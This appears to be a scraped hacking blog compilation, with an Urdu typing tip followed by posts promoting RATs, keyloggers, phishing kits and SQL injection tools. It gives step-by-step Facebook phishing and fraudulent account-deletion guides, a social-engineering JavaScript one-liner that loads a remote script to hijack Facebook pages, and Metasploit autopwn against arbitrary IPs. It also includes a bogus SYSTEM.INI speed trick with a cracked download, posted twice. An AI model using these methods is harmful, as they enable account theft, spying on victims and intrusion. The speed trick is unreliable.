How to write Urud on Facebook

اردو لکھنا نہایت آسان ہے، میں آپ کو دو طریقے بتاتا ہوں ان میں سے جو آپ کو مناسب لگے آپ وہی استعمال کر سکتے ہیں

١) آپ ''پاک اردو انسٹالر'' کو انسٹال کر لیں اس کے بعد آپ جہاں چاہیں اردو میں لکھ سکتے ہیں، انسٹالر یہاں سے ڈاؤن لوڈ کر سکتے ہیں، یہاں استعمال کا طریقہ بھی دیا ہوا ہے اگر کوئی مسئلہ ہو تو آپ پوچھ سکتے ہیں.

http://www.mbilalm.com/urdu-installer.php

اس میں تھوڑا سا ٹائم شروع میں لگے گا ہاتھ بیٹھنے میں لیکن پھر آسان ہو جائے.

٢) دوسرا طریقہ ذرا شارٹ کٹ ہے، اور وہ یہ ہے کہ گوگل نے ایک ٹرانسلٹریشن سروس شروع کی ہے جس میں آپ اگر رومن میں لکھیں تو گوگل اسے اردو حروف میں تبدیل کر دیتا ہے مثلآ اگر میں اس کے اندر لکھوں
"kaisay" تو وہ خود بخود اسے "کیسے" میں تبدیل کر دے گا.

ٹرانسلٹریشن یہاں پر کی جا سکتی ہے، اس کے پہلے خانے میں زبان کو منتخب کر لیں یعنی اردو اور پھر لکھ کر دیکھیں
http://www.google.com/transliterate
-------------------------------------------------
'آئی فون' ، 'آئی پیڈ' اور 'آئی پاڈ' کے صارفین
Urdu Writer
ڈاؤن لوڈ کریں


-----------------------------------------------
تو پھر اردو کو اردو حروف میں لکھنا شروع کیجیے. اور پھر اردو میں ہی لکھ کر کمنٹ کیجیے.
 

Magic PS v1.5 SE FINAL- Hack Password Yahoo ID or Messenger


Magic PS v1.5 SE FINAL is a free tool to hack any Yahoo mail ID or Yahoo Messenger password. You can use it toget password for any yahoo or messenger ID. Magic PS v1.5 is a Powerfull Password Sender for Yahoo!.

CyberGate RAT - Hacking Facebook, Twitter and Email Id's Passwords






CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. So, its much exciting, therefore i thought to give a tutorial about it, since it can also be used for constructive purpose i-e you can view the clients of you office or your homies, that what are they doing at computer. Rather they are sincere or not.

 

How To Hack a Remote Computer Using Ardamax Keylogger

Ardamax keylogger software which can be used to hack remote computer,Basically Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to your mailbox. No doubt, these keystrokes contain the victim’s Email passwords and All such important information.



 

Password Generator, Generate Every Type Of Passwords

 

by this tool you can Genrate upper case , lower case and numeric passwords Generate Every Type Of Passwords unlimited

Admin Login Finder




Using the ALF you can find login pages very fast. It tests about 2 urls every second, and does 200 links in less than a minute. Of course it also depends on your internet speed.






 

Havij Advanced SQL Injection




Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users

 

WINDOWS PASSWORD RECOVERY TOOL





SAMInside recovers Windows NT/2000/XP/2003/Vista user passwords by implementing following types of password attack:


Brute-force attack
Distributed attack
Mask attack
Dictionary attack
Hybrid attack
Pre-calculated tables attack

It includes various types of data imports like LM/NT Hashes, PWDump, LC, LST etc.

 

PROXY FINDER


Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.

IP ANONYMIZER


 


IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.

HOTSPOT SHIELD

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application employs the latest VPN technology, and is easy to install and use.

 

AIRSNORT







 AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Whereas Aircrack can crack both WEP and WPA passwords, AirSnort has a limitation to cracking only WEP passwords.


 

AIRCRACK wifi cracker


Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

SONIC BAT - THE BATCH FILE VIRUS CREATOR









This program creates batch .bat viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer.

HACK COMPUTERS REMOTELY : TURKOJAN GOLD 4






Turkojan Gold 4 is a remote access Ra which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling the victim computer in many ways.

Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected.

HACK COMPUTERS REMOTELY : PRORAT



PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect victim's PC in different ways. Just create the server and send it to the victim.

PHISHER CREATOR








Phisher Creator is an advanced phishing page builder for all websites. We can create phishing page for any website by using this phisher creator to hack any email account.Here is tutorial for Gmail and Orkut Phising



 

HACKING GMAIL ACCOUNTS :PHISING

Gmail phisher is a phisher for hacking Gmail accounts Like Orkut Phising. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated automatically.











 

Where to Start with hacking

I have seen this question so many times, “Where to start with hacking?” Now I am going to give you my opinion on where to begin. There is just one thing you should remember, “Hacking is a lifestyle”.

There are three types of hackers:

White Hats:

The White Hat hacker has dedicated himself to fight malware and help others with their computer problems. He is a person you can trust, and he will most likely end up in a good paying job as a computer programmer or a security consultant. He will most certainly not end up in jail.

Grey Hats:

The Grey Hat hacker are in between white Hats and Black Hats. He will most likely commit pranks at people that he thinks is harmless, but it can also be illegal. He can at one time be helpful and help you with a computer problem, but at the same time infect you with his own virus. There is a chance that the grey hat will end up in prison.

Black Hats:

The Black hat hacker also known as a cracker is the one who deface websites, steal private information and such illegal activity. It is very time consuming to become a black hat. It can be very hard for them to get a job because of the illegal activity. If law enforcements gets you, you can expect jail time.

So where to start?

You should know the answer to these questions before you start your hacking career.

Which type of hacker do you want to be (white hat, grey hat or black hat)?
Which type of hacking do you want to work with (website hacking, system exploits, pentesting etc.)?
What is your end-goal?

 You should meet these requirements to become a successful hacker.

You shall be patient.
You shall dedicate a lot of time to hacking. You will never stop learning, since hacking is a lifestyle.
You should have a computer (I expect you to have one since you are reading this).
You shall be interested in how the different computer systems works, and how to control them.

 Now that you have an idea of what kind of hacker, you want to be we will look closer into the different topics you can work with as a hacker.

 Website Hacking:

You properly already guessed it, but website hacking is about hacking websites. You use your skills to find exploits and vulnerabilities in websites and web applications. Almost all major hacking stories in the news are about websites and databases that have been hacked. Once you have enough experience in website security you will be amazed about how easy it is to find vulnerabilities in websites. However, it will take a lot of effort and time to reach that level of skills. You will need to know a large amount of server-side languages and website construction languages like PHP, HTML, JavaScript, SQL, ASP, ASP.NET and Perl. This was just some of the languages you should know about. I will recommend you to take JavaScript, SQL and PHP very serious since it is in those languages you will find the most vulnerabilities.

Pentesting and Forensics:

Pentesting and forensics can earn you big money. It is these guys the company’s call when they have been hacked. They are exerts in operating systems, wireless connections and exploiting computers. This way will take A LOT of time and effort since there is so much you should know about. You shall know about how the different operating systems works, which exploit there is to them, how to exploit them, routers, encryption, malware etc. the list is almost endless.

Code exploiting:

Not many people know about this. This will require you to be a complete expert at programming. You shall be at least as good at these programming languages as your main language like English. This kind of hacking is taking a lot of time, and will require you to be patient. Do not get me wrong, every company that releases software like Symantec, Google, Microsoft, Adobe, and Oracle have hackers with these skills employed to check their software for vulnerabilities. Sadly, they cannot find every security hole and therefore some very smart black hat hackers are able to find them, and exploit them before the companies get the vulnerability patched. You should know the most popular languages like C++, Java and C etc.

Computer security:

The work these people do looks a lot like the pentesters. These people is able to detect and analyze new viruses and malware. They are working for companies like Symantec, KasperSky and Avira etc. Some of them are also working on labs that tests AV’s and new viruses. They are experts in how viruses works and how they infect systems.

You should now have an idea on where to start and in which direction you want to go. If you found any errors or typos feel free to contact me, and I will look into it. I will be updating this thread recently and add more details. I will soon add a dictionary, which explains the most basic hacking terms. I have putted a lot of effort in this tutorial and my goal with this tutorial is to give computer-interested people an idea of where they should start.

To the so-called “noobs”, (though I am not a fan of that expression) who reads this:

I hope I have inspired you to begin at hacking. I hope that I have cleared things up a little bit, so it does not seem so messy anymore. If you have any questions or something you did not understand, I would gladly explain it to you again. As one last thing, I would HIGHLY recommend you to become a white hat hacker. Welcome to the hacker’s world, a new world will open up for you and you will never regret that you chose to become a hacker.

 (08-26-2012 07:02 PM)
mrLyosha Wrote:
I'm glad that you found my post informative and useful.And after some time I remembered one more kind of hackers closely connected to Black Hat Hacking it's a Script Kidding. Some authors put it in different kind, but to be absolutely true Script Kiddies are Black Hats but without good knowledge of hacking, using only automated tools and attacking bad protected targets.
p.s. I'm just begging learning now basics, so sorry if I'm mistaken, and sorry for possible grammar mistakes in my posts)
p.s.s Just saw that I have rank: Script kiddie)

mrLyosha asked for this, and just for any case that anybody is interested in this?

I have just wrote this down, and i think it will explain your different hacker "ranks".

The Elite Hacker: They know what they are talking about. they are expert in their fields, and they are the top of the food chain. They are writing the programs the Script Kiddies use, and they gain much respect as they know their shit.

The Middle Class Hacker: They know a lot about hacking, and are about to step up to The Elite Hacker. But they do still have a lot to learn. They have a lot of skills, and most or some of them will be able to write their own programs or find the vulnerabilities by themselves.

The Script Kiddie: They are beginners or complete morons. They usually find a SQL injectable site and thinks they the most l33t H4x0r in the world. They use the tools written by The Elite Hacker and have absolutely no idea what they are doing.

But some Script Kiddies are just learning and are not bragging about how they found a SQL injectable site. They study others work and learn about how they did it. These guys will definitly be better hackers and will gain respect as they are just trying to learn, not to prove that they can find a SQL injectable site.

ENJOY!

Hack Facebook Accounts BY Fake login Page: facebook hacking

Today i will teach you how to make a Fake login page (phisher) to Hack Facebook account Follow the steps given below to Hack a facebook account.

Hack a Facebook Account By Fake login Page :

First of all we need a fake login page (fake.html), login.php You can download both the files from Click Here

Now open login.php which we downloaded earlier with a note pad and press (ctrl+ f ) and search for the term http://enteryoursite.com and replace with the site address
where you want victim to be redirected and save it
Now create a account in Free web hosting site like 110mb.com , T35.com or ripway.com
Now upload both the files (fake.html , login.php ) to your directory .Now send the fake.html link to your victim

Example :- www.yoursite.110 mb.com/fake.html

Now when the victim clicks the link and enters all the information in our fake login page and click login He will be redirected to site which we did in step 3

Now to see the victims id ,password login to your account "110mb.com " where you can see a newfile "password.txt" open it .Now you can see the userid
and the password of the victim

 This a simple but a very effective method of Hacking a facebook account Enjoy!

Delete Any Facebook Account Facebook Hacking

Delete Any Facebook Account
There is a method to delete any facebook profile .It works 100 percent But its just for educational purpose. Deleted Profile can never be recovered. Use wisely.

WHAT ALL U NEED ?

 Victim's profile link ( you can get it easily )
His/Her Email which he/she uses to sign in
His/Her birth date which he/she has used in the profile
Make an Email ID on gmail or yahoo with the first name and last name same as on victim's facebook profile.

HOW TO DO IT?

1. Go this page:

http://www.facebook.com/help/contact.php?show_form=hack_nologin_access

2. Enter details. In the place of email address enter the fake email u created.

3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are victim's name and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ' I am a girl and it poses threat to my social life ' and write anything you want that could make them take action. ( no need though in 100 % cases they delete the account )

4. After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don't have access to it. And repeat what all you wrote in first mail.

5. Next Day or Same Day you will get an Email that your account is disabled.
Enjoy!

Difference B/w Virus , Worms ,Trojan & Spyware : VIRUSESs

 All of us have heard already about VIRUS , WORMS , TROJANS and SPYWARES but only few ones know the difference b/w them. As usually we considerd every detected thing by antiviruses as VIRUS but its not a case. The antiviruses not only save us from viruses but also protects us from Trojans , Worms and Spywares. All can be dangerous for your computers . Today i'll tell about difference them

VIRUS

 A virus is a self replication program and software which is attached to an executeable
files. When file is opened or executed the virus automatically gets executed and enter into system memory .when enters it searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program.

Worms

Worms are very similar to viruses but differ in way that they don't bind themselves to executable files instead to replicate themselves they uses the network.If you find excessive use of your network bandwidth then you may be infected by a worm.So,a worm donot require a user to execute any file for its execution it can work without user intervention.

Trojan Horse

A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to facilitate unauthorised remote access to the computer.Trojan’s donot replicate themselves.

Spyware

A spyware is a program and software that secretly monitors and collects pieces of information.They usually run in stealth mode and cannot be detected easily.Keyloggers is a great example of spyware software.There are not limited to just spying but can also send data to remote computers.

Here is the list of names of most harmful virus and worms in the history of computers

Storm Worm
Leap-A/Oompa- A
Sasser and Netsky
MyDome (Novarg)
SQL Slammer / Sapphire
Nimda
Code Red and Code Red II
The Klez
ILOVEYOU
Melissa


How To Secure Wifi

Wifi stands for Wireless Fidelity.
Most people rush through while setting up their wifi connection without thinking about the security of wifi connection.It is quite understandable that they want to connect to Internet as quickly as possible and Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite early and leave their wifi network unsecured.Their are several loopholes through which your unsecured wireless connection can be easily hacked.So ,In this post you will know how to secure your wifi network with simple steps.

If your wireless network has been hacked or accessed by somebody else then it may lead to complete usage of your data if you have a limited data plan or worse it may lead to extra charges on you.Even if you have unlimited data plan then also you will get less speed if your wifi has been hacked.
The step by step guide given below summarize all the necessary steps you should take for securing your wifi network.


Change Default Administrator Passwords (and Usernames)

Whenever you purchase a new moden or new connection then you are required to configure your modem.The modem configuration page can be accessed by entering a username and password for protecting it from unauthorized access.By default the usernames that most of the modem companies use are admin or administrator and the default password that is used is password,public,admin or some other simple word.So change your usename and password as soon as you setup your modem because these username and password combinations are known by most of the hacker .

Turn on (Compatible) WPA / WEP Encryption

Most of the modern modems allows both wpa and wep for securing your wifi.Applying these keys will not only encrypt your wifi network connection but it will also apply authentication .So,you should select the strongest encryption to secure your wifi network.

Enable MAC Address Filtering

Mac addresses are also known as physical address of a computer.Mac address is unique address of a computer and it is static and cannot be changed.So,your router can be configured to connect to only to thosedevices whose MAC address match to the home devices.It will secure your wifi connection by just allowing the home devices to connect to it.

Enable Firewalls On Each Computer and the Router

Most of the modern routers come with a inbuilt firewall capability to secure your wifi network.Make sure that your router firewall is turned on if your router has one.On the other hand you can also use firewall in your computers.They provide an extra and a strong layer of protection to secure your wifi connection from hackers or network attackers.

Position the Router or Access Point Safely

A small leakage of wifi signal from home to the outside cannot be stopped but the leakage of the signal can be minised to a greater extent by just changing the direction of your antenna of the router.Never place your router near windows instead try to place it in the center of the house.You will get best quality of wifi signal through out home with less leakage of wifi signal to the outer world.

Turn Off the Network During Extended Periods of Non-Use

Turn of the router when it is not used.It will secure your wifi connection by giving out less access time to hackers to your wifi network and it will be difficult for them to hack in short period of time.Moreover it will be saving your electricity which will be a secondary advantage for you.

WATCH AND LISTEN AUDIO & VIDEO LIVE WITHOUT BUFFERING ON 2G Connection

A 2G internet user really suck. You cannot download file Quickly and the most important that many user faces is, they cannot watch or listen online streaming video or audio.They cannot even watch YouTube video without buffering...
So my reader today i am giving you and awesome tricks to play video without buffering even with the speed of 30-40 KBps. You can watch live TV and also listen online Radio without buffering.



Step 1

Open run command box by pressing ctrl+r together and in the box that appear type SYSTEM.INI
Note: Your UAC or "User Account Control" should be set to "Never notify"
Step 2
Copy and paste the below line in the SYSTEM.INI and save it
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps


Here is the picture of SYSTEM.INI before chnaging



After Changing






Step 3)
Download this software name Speed-bits video accelerator from here Speed-bits
extract the rar file and there you will find 3 file


Speedbits video accelerator setup.
Video accelerator crack.
Instruction file.
read the Instruction and install the software. You will notice after this tricks you can watch YouTube video without buffering and also you can watch live TV and listen to online Radio.ENJoy!

WATCH AND LISTEN AUDIO & VIDEO LIVE WITHOUT BUFFERING ON 2G Connection





A 2G internet user really suck. You cannot download file Quickly and the most important that many user faces is, they cannot watch or listen online streaming video or audio.They cannot even watch YouTube video without buffering...
So my reader today i am giving you and awesome tricks to play video without buffering even with the speed of 30-40 KBps. You can watch live TV and also listen online Radio without buffering.



Step 1

Open run command box by pressing ctrl+r together and in the box that appear type SYSTEM.INI
Note: Your UAC or "User Account Control" should be set to "Never notify"
Step 2
Copy and paste the below line in the SYSTEM.INI and save it
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps


Here is the picture of SYSTEM.INI before chnaging



After Changing






Step 3)
Download this software name Speed-bits video accelerator from here Speed-bits
extract the rar file and there you will find 3 file


Speedbits video accelerator setup.
Video accelerator crack.
Instruction file.
read the Instruction and install the software. You will notice after this tricks you can watch YouTube video without buffering and also you can watch live TV and listen to online Radio.ENJoy!

Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page

Step 1: First download Facebook page hacking exploit...

for download


Step 2: Now open the pagehack.js with notepad and search 4 nk@wildhacker.com and change nk@wildhacker.com with your facebook email.

Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.

Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.

Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb won t help this time)and upload facebook page hacking exploit on your free hosting website. you will get url address something like this,

www.yoursite.com/pagehack.js
Step 5: Now ask victim to paste this in browser address bar, He must be admin of page, which you wants to hack:

j(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)

Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with your own address.

Tip: Tell him that it will make your page safe, or something else like attracting.

When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy, But don't hack for bad cause, I will not be responsible for any consequences made by you.

Thats it.. ENJOY!

Hack Any Computer With An IP :PC HACK


 I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it’s IP. Lets begin…

(1) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
(2) You need PostgrSQL for your database. Download here:


Make sure you use all the defaults or Metasploit woun’t work!
(3) Now lets get down to buisness… After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and clickconnect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5…

(4) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:

(5)Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don’t wory, this is normal.

Type db_host to make sure you are connected correctally.
(6)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000…
(7) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back…
(8) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
(9) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
sessions -i ExploitNumber


ENJOY!

Bandwidth Controller




Bandwidth Controller is a complete traffic shaping package for Windows 2000, XP and 2003 Server. It allows network administrators to limit internet usage in real-time using a high performance processing core.